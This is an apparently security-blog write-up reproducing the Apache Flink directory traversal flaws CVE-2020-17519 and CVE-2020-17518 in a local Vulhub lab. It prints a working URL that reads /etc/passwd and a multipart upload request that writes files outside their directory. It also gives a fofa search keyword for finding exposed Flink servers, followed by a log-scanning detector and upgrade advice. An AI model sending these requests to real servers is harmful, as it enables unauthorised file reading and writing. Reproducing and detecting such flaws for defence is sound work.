Apache Flink Directory Traversal Vulnerabilities (CVE-2020-17518, CVE-2020-17519): Reproduction

CVE-2020-17519 Reproduction

0x01 Vulnerability Description

Apache Flink directory traversal: the JobManager REST API can be abused to read (CVE-2020-17519) or write (CVE-2020-17518) files on the remote host.

0x02 Affected Versions

Flink 1.5.1 through 1.11.2

0x03 Reproduction Steps

  1. Reproduce with Vulhub:

Download link:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519


Bring up the environment with docker-compose: docker-compose up -d

Run docker ps to check the running containers (the cve-2020-17518 environment is used here)


Open http://127.0.0.1:8081/ in a browser


Construct the exploit URL (the path is double URL-encoded, `%252f` decoding to `%2f` and then to `/`):

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd


Tear down the environment:

docker-compose down


0x04 fofa Search Keyword

app="APACHE-Flink"


CVE-2020-17518 Reproduction

0x05 Constructing the Request

The setup is the same as for CVE-2020-17519; send the following request directly (the traversal sits in the multipart filename of the jar upload):

POST /jars/upload HTTP/1.1
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--


The server responds with 400, but the file has already been written.


Then read it back directly through the log-read traversal:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

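Both requests above share one signature that a defender can look for: a filename or path that, once the nested percent-encoding is peeled off, contains a `..` segment. The detector below is an added example, not code from the post or from the Flink project; it assumes a reverse proxy in front of the JobManager writing combined-format access logs, and the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed reverse-proxy access log lines (not from the original post).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /jobmanager/logs/..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1891',
    '10.0.0.9 - - [01/Jan/2021:10:00:07 +0000] "GET /jobs/overview HTTP/1.1" 200 342',
]
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')
LOG_PREFIX = "/jobmanager/logs/"


def fully_decode(value, max_rounds=3):
    """Peel nested percent-encoding: ..%252f -> ..%2f -> ../ (bounded so odd input cannot loop)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_directory(relative):
    """True if any decoded path segment is '..', i.e. the name climbs out of its directory."""
    segments = fully_decode(relative).replace("\\", "/").split("/")
    return ".." in segments


def is_log_read_traversal(path):
    """CVE-2020-17519 pattern: /jobmanager/logs/<name> where <name> leaves the log directory."""
    return path.startswith(LOG_PREFIX) and escapes_directory(path[len(LOG_PREFIX):])


def is_jar_upload_traversal(filename):
    """CVE-2020-17518 pattern: the multipart filename sent to /jars/upload carries a path, not a bare name."""
    decoded = fully_decode(filename).replace("\\", "/")
    return "/" in decoded or decoded in (".", "..")


def scan_access_log(lines):
    """Return (source_ip, path) for every GET that matches the log-read traversal pattern."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and match.group("method") == "GET" and is_log_read_traversal(match.group("path")):
            hits.append((line.split(" ", 1)[0], match.group("path")))
    return hits


if __name__ == "__main__":
    for ip, path in scan_access_log(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path}")
```

The upload check has to run on the multipart `Content-Disposition` filename (for example in a WAF or upload hook), since an access log only records the `/jars/upload` path, not the body.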

0x06 Remediation

Upgrade to a fixed release: Flink 1.11.3 or Flink 1.12.0.

0x07 Vulnerability Verification PoC

cve-2020-17519
